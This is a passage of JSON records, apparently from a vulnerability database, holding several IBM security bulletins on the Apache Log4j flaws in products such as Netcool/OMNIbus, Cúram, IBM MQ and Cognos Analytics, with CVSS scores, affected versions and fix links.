terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nNetcool/OMNIbus| 8.1.0 \n \n\n\n## Remediation/Fixes\n\nIBM strongly recommends addressing the vulnerability by applying the fix below: \n\n**_Product_**| **_VRMF_**| **_APAR_**| _ **Remediation/Fix** \n_ \n---|---|---|--- \nOMNIbus| 8.1.0.28| IJ36852| <https://www.ibm.com/support/pages/node/6527268> \n \n## Workarounds and Mitigations\n\nIBM recommends installing Tivoli Netcool/OMNIbus 8.1.0 fix pack 8.0.1.28 or later.\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n24 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSSHTQ\",\"label\":\"Tivoli Netcool\\/OMNIbus\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF051\",\"label\":\"Linux on IBM Z Systems\"},{\"code\":\"PF027\",\"label\":\"Solaris\"},{\"code\":\"PF033\",\"label\":\"Windows\"}],\"Version\":\"8.1.0\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-01T11:47:35", "type": "ibm", "title": "Security Bulletin: Tivoli Netcool/Omnibus installation contains vulnerable Apache Log4j code (CVE-2021-44832, CVE-2021-45046, CVE-2021-45105)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-02-01T11:47:35", "id": "A7C08E9177A10AC583EA198F89BF0B091ED0697BF42F39DC0B151F7465C9BAF3", "href": "https://www.ibm.com/support/pages/node/6552546", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:44:57", "description": "## Summary\n\nIBM C\u00faram Social Program Management (SPM) uses the Apache Log4j libraries for SPM logging infrastructure. There are publicly known vulnerabilities for Apache Log4j which could allow a remote attacker to execute arbitrary code on the system.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44832](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44832>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker with permission to modify the logging configuration file to execute arbitrary code on the system. By constructing a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI , an attacker could exploit this vulnerability to execute remote code. \nCVSS Base score: 6.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/216189](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216189>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-45105](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nC\u00faram SPM| 8.0.0.0 - 8.0.1.0 \n \n\n\n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerability now by upgrading.**\n\n_Product_| _VRMF_| _Remediation_ \n---|---|--- \nC\u00faram SPM| \n\n8.0.1.0\n\n| \n\nVisit IBM Fix Central and upgrade to [8.0.1.0_iFix2](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=Smarter%20Cities&product=ibm/Other+software/Curam+Social+Program+Management&release=8.0.1.0&platform=All&function=all> \"8.0.1.0_iFix2\" ) \n \n## Workarounds and Mitigations\n\nBased on current information, no IBM C\u00faram Social Program Management versions before V8 are impacted by the CVE-2021-44228 , CVE-2021-45046 , CVE-2021-44832 , CVE-2021-45105 vulnerabilities. Please refer to this [link](<https://www.ibm.com/support/pages/node/6526676> \"link\" ) for further information.\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n14 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU014\",\"label\":\"Watson Health\"},\"Product\":{\"code\":\"SS8S5A\",\"label\":\"C&#250;ram Social Program Management\"},\"Component\":\"All\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF010\",\"label\":\"HP-UX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF027\",\"label\":\"Solaris\"},{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF035\",\"label\":\"z\\/OS\"}],\"Version\":\"8.0.1\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB47\",\"label\":\"Health\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-14T10:51:11", "type": "ibm", "title": "Security Bulletin: Vulnerabilities in Apache Log4j may affect C\u00faram Social Program Management (CVE-2021-44832 , CVE-2021-45105)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-14T10:51:11", "id": "674DDEB58033DAB9D03ED4483C0C1118FD09DBE69E73AD0AAC428EBFC61E2474", "href": "https://www.ibm.com/support/pages/node/6540904", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:45:17", "description": "## Summary\n\nA Denial of Service issue was identified within the Log4j fix for CVE-2021-45046 that is used by Fabric Gateway to provide logging functionality. Fabric Gateway is used by the IBM MQ blockchain bridge component of IBM MQ to provide connection capability between IBM MQ queue managers and Hyperledger Fabric. The IBM MQ Blockchain Bridge is shipped as part of IBM MQ on Linux x86-64 only, under the MQSeriesBCBridge RPM package. Based on current knowledge and analysis, no other IBM MQ components or installable packages are affected. This bulletin provides patch information to address the reported Log4j vulnerabilities\n\n## Vulnerability Details\n\n**CVEID: **[CVE-2021-45105](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>) \n**DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\n**CVEID: **[CVE-2021-44832](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44832>) \n**DESCRIPTION: **Apache Log4j could allow a remote attacker with permission to modify the logging configuration file to execute arbitrary code on the system. By constructing a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI , an attacker could exploit this vulnerability to execute remote code. \nCVSS Base score: 6.6 \nCVSS Temporal Score: See: <https://exchange.xforce.ibmcloud.com/vulnerabilities/216189> for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s) | Version(s) \n---|--- \nIBM MQ | 9.2 CD \nIBM MQ | 9.1 CD \nIBM MQ | 9.2 LTS \n \n## Remediation/Fixes\n\nThis issue is resolved by APAR IT39467 \n\nThe following patches resolve CVE-2021-45046, CVE-2021-44228, CVE-2021-45105 & CVE-2021-44832\n\n**IBM MQ version 9.2 LTS**\n\n[Apply iFix 9.2.0.4-IBM-MQ-LinuxX64-LAIT39386-IT39444-IT39467](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EWebSphere&product=ibm/WebSphere/WebSphere+MQ&release=9.2.0.4&platform=All&function=fixId&fixids=9.2.0.4-IBM-MQ-LinuxX64-LAIT39386-IT39444-IT39467&includeSupersedes=0&source=fc> \"Apply iFix 9.2.0.4-IBM-MQ-LinuxX64-LAIT39386-IT39444-IT39467\" )\n\n**IBM MQ version 9.1 CD and 9.2 CD**\n\n[Apply iFix 9.2.4-IBM-MQ-LinuxX64-LAIT39386-IT39444-IT39467 ](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EWebSphere&product=ibm/WebSphere/WebSphere+MQ&release=9.2.4&platform=All&function=fixId&fixids=9.2.4-IBM-MQ-LinuxX64-LAIT39386-IT39444-IT39467&includeSupersedes=0&source=fc> \"Apply iFix 9.2.4-IBM-MQ-LinuxX64-LAIT39386-IT39444-IT39467\" )\n\n## Workarounds and Mitigations\n\nThe IBM MQ Blockchain Bridge is shipped as part of IBM MQ on Linux x86-64 only, under the MQSeriesBCBridge RPM package. Based on current knowledge and analysis, no other IBM MQ components or installable packages are affected. \n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n07 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSYHRD\",\"label\":\"IBM MQ\"},\"Component\":\"Blockchain Bridge\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"9.1.0; 9.2.0\",\"Edition\":\"All\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-07T18:00:41", "type": "ibm", "title": "Security Bulletin: IBM MQ Blockchain bridge dependencies are vulnerable to issues in Apache Log4j (CVE-2021-45105 & CVE-2021-44832)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-07T18:00:41", "id": "F0259373A53F6B73B3C7BD9A2F3F10DB053D9CC563866E61F5A496D33B416EA9", "href": "https://www.ibm.com/support/pages/node/6538896", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:40:26", "description": "## Summary\n\nIBM Cognos Analytics is affected by security vulnerabilities. Apache Log4j is used by IBM Cognos Analytics as part of its logging infrastructure. This bulletin addresses the exposure to the Apache Log4j vulnerabilities: CVE-2021-45105 and CVE-2021-44832. IBM Cognos Analytics has upgraded Apache Log4j to v2.17.1 Please note that this update also addresses CVE-2021-44228 and CVE-2021-45046.\n\n## Vulnerability Details\n\n**CVEID: **[CVE-2021-44832](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44832>) \n**DESCRIPTION: **Apache Log4j could allow a remote attacker with permission to modify the logging configuration file to execute arbitrary code on the system. By constructing a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI , an attacker could exploit this vulnerability to execute remote code. \nCVSS Base score: 6.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/216189](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216189>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H) \n \n**CVEID: **[CVE-2021-45105](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>) \n**DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\n## Affected Products and Versions\n\nIBM Cognos Analytics 11.2.x\n\nIBM Cognos Analytics 11.1.x\n\nIBM Cognos Analytics 11.0.6 to 11.0.13 FP4\n\n## Remediation/Fixes\n\nIf you have one of the listed affected versions, it is strongly recommended that you apply the most recent security update. \n\n\nTwo links have been provided for each Interim Fix. The majority of clients will access the Interim Fix via the link under Fix Version. For clients who have IBM Cognos Analytics by way of another product such as IBM Planning Analytics, IBM Cognos Controller, IBM OpenPages, etc. you will access the Interim Fix via the link under the Bundled Customers.\n\nAffected Version\n\n| \n\nFix Version\n\n| \n\nBundled Customers \n \n---|---|--- \n \nIBM Cognos Analytics 11.2.x\n\n| \n\n[IBM Cognos Analytics 11.2.1 Interim Fix 3](<https://www.ibm.com/support/pages/node/6525670>)\n\n| \n\n[IBM Cognos Analytics 11.2.1 Interim Fix 3 (Bundled)](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm+Information+Management&product=ibm/Information+Management/Cognos+8+Business+Intelligence&release=All&platform=All&function=fixId&fixids=11.2.1-BA-CA-BNDL-IF003:0&includeSupersedes=0&source=fc&login=true&downloadMethod=http&source=fc> \"IBM Cognos Analytics 11.2.1 Interim Fix 3 \$Bundled\$\" ) \n \nIBM Cognos Analytics 11.1.x\n\n| [IBM Cognos Analytics 11.1.7 Interim Fix 9](<https://www.ibm.com/support/pages/node/6525664> \"\" ) | [IBM Cognos Analytics 11.1.7 Interim Fix 9 (Bundled)](<https://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm+Information+Management&product=ibm/Information+Management/Cognos+8+Business+Intelligence&release=All&platform=All&function=fixId&fixids=11.1.7-BA-CA-BNDL-IF009:0&includeSupersedes=0&source=fc&login=true&downloadMethod=http&source=fc>) \n \nIBM Cognos Analytics 11.0.6 to 11.0.13 FP4\n\n| \n\n[IBM Cognos Analytics 11.0.13 Interim Fix 5](<https://www.ibm.com/support/pages/node/6525666>)\n\n| \n\n[IBM Cognos Analytics 11.0.13 Interim Fix 5 (Bundled)](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm+Information+Management&product=ibm/Information+Management/Cognos+8+Business+Intelligence&release=All&platform=All&function=fixId&fixids=11.0.13-BA-CA-BNDL-IF005:0&includeSupersedes=0&source=fc&login=true&downloadMethod=http&source=fc> \"IBM Cognos Analytics 11.0.13 Interim Fix 5 \$Bundled\$\" ) \n \n \nPlease note that this update also addresses CVE-2021-44228 and CVE-2021-45046.\n\n \nThe required remediation will be applied during the standard monthly IBM Cognos Analytics on Cloud maintenance window January 15, 2022\n\n## Workarounds and Mitigations\n\nThe IBM Cognos Analytics team have developed a \u201cno-upgrade\u201d option for our \u201cOn Prem\u201d (local installation) customers.\n\nThe single version of the patch is applicable to IBM Cognos Analytics versions 11.0.6 to 11.0.13 FP4, 11.1.x and 11.2.x. \n\nThe log4jSafeAgent file that is provided for Cognos Analytics modifies the class byte code at the Java startup time. It removes the vulnerable JNDI lookup, and enforces the StrSubstitutor recursion limit without altering the installed product.\n\nIt effectively rewrites the \u201corg/apache/logging/log4j/core/lookup/JndiLookup\u201d class to remove its content during IBM Cognos Analytics start up.\n\nTo get the patch and detailed instructions, click this link: [log4jSafeAgent](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=Cognos&product=ibm/Information+Management/Cognos+Analytics&release=All&platform=All&function=fixId&fixids=11.x-BA-CA-MP-log4jFix&includeRequisites=1&includeSupersedes=0&downloadMethod=http> \"<log4jSafeAgent2021>\" ) \n \nBundle Customers can use the following link: [log4jSafeAgent Bundled](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=ibm+Information+Management&product=ibm/Information+Management/Cognos+8+Business+Intelligence&release=All&platform=All&function=fixId&fixids=11.x-BA-CA-BNDL-log4jFix:0&includeSupersedes=0&source=fc&login=true&downloadMethod=http&source=fc> \"<log4jSafeAgent2021 Bundled>\" )\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n[Security Bulletin: IBM Cognos Analytics: Apache Log4j vulnerability (CVE-2021-44228)](<https://www.ibm.com/support/pages/node/6526474> \"Security Bulletin: IBM Cognos Analytics: Apache Log4j vulnerability \$CVE-2021-44228\$\" )\n\n[Security Bulletin: IBM Cognos Analytics: Apache Log4j vulnerability (CVE-2021-45046)](<https://www.ibm.com/support/pages/node/6528388> \"Security Bulletin: IBM Cognos Analytics: Apache Log4j vulnerability \$CVE-2021-45046\$\" )\n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n20 April 2022 Updated Fix Version links for CA 11.x Bundle Customers to point to latest Interim Fix that address Apache log4j vulnerabilities \n10 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSTSF6\",\"label\":\"Cognos Analytics\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"11.2, 11.1, 11.0\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-20T19:28:52", "type": "ibm", "title": "Security Bulletin: IBM Cognos Analytics: Apache Log4j vulnerabilities (CVE-2021-45105, CVE-2021-44832)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-04-20T19:28:52", "id": "59E669B8BB67D676E7382F77EAD621E08DFCFBF626C52F337A77A33EF6F33748", "href": "https://www.ibm.com/support/pages/node/6538720", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:40:25", "description": "## Summary\n\nIBM Cognos Analytics is affected by a security vulnerability. Apache Log4j is used by IBM Cognos Analytics as part of its logging infrastructure. This bulletin addresses the exposure to the Apache Log4j (CVE-2021-44228) vulnerability. Please note that this Security Bulletin has been superseded by Security Bulletin: IBM Cognos Analytics: Apache Log4j vulnerabilities (CVE-2021-45105, CVE-2021-44832). See References section below.\n\n## Vulnerability Details\n\n**CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n**DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM Cognos Analytics 11.2.x\n\nIBM Cognos Analytics 11.1.x\n\nIBM Cognos Analytics 11.0.6 to 11.0.13 FP4\n\n## Remediation/Fixes\n\nIf you have one of the listed affected versions, it is strongly recommended that you apply the most recent security update. \n\n\nTwo links have been provided for each Interim Fix. The majority of clients will access the Interim Fix via the link under Fix Version. For clients who have IBM Cognos Analytics by way of another product such as IBM Planning Analytics, IBM Cognos Controller, IBM OpenPages, etc. you will access the Interim Fix via the link under the Bundled Customers.\n\nAffected Version\n\n| \n\nFix Version\n\n| \n\nBundled Customers \n \n---|---|--- \n \nIBM Cognos Analytics 11.2.x\n\n| \n\n[IBM Cognos Analytics 11.2.1 Interim Fix 3](<https://www.ibm.com/support/pages/node/6525670>)\n\n| \n\n[IBM Cognos Analytics 11.2.1 Interim Fix 3 (Bundled)](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm+Information+Management&product=ibm/Information+Management/Cognos+8+Business+Intelligence&release=All&platform=All&function=fixId&fixids=11.2.1-BA-CA-BNDL-IF003:0&includeSupersedes=0&source=fc&login=true&downloadMethod=http&source=fc> \"\" ) \n \nIBM Cognos Analytics 11.1.x\n\n| [IBM Cognos Analytics 11.1.7 Interim Fix 9](<https://www.ibm.com/support/pages/node/6525664> \"\" ) | [IBM Cognos Analytics 11.1.7 Interim Fix 9 (Bundled)](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm+Information+Management&product=ibm/Information+Management/Cognos+8+Business+Intelligence&release=All&platform=All&function=fixId&fixids=11.1.7-BA-CA-BNDL-IF009:0&includeSupersedes=0&source=fc&login=true&downloadMethod=http&source=fc>) \n \nIBM Cognos Analytics 11.0.6 to 11.0.13 FP4\n\n| \n\n[IBM Cognos Analytics 11.0.13 Interim Fix 5](<https://www.ibm.com/support/pages/node/6525666>)\n\n| \n\n[IBM Cognos Analytics 11.0.13 Interim Fix 5 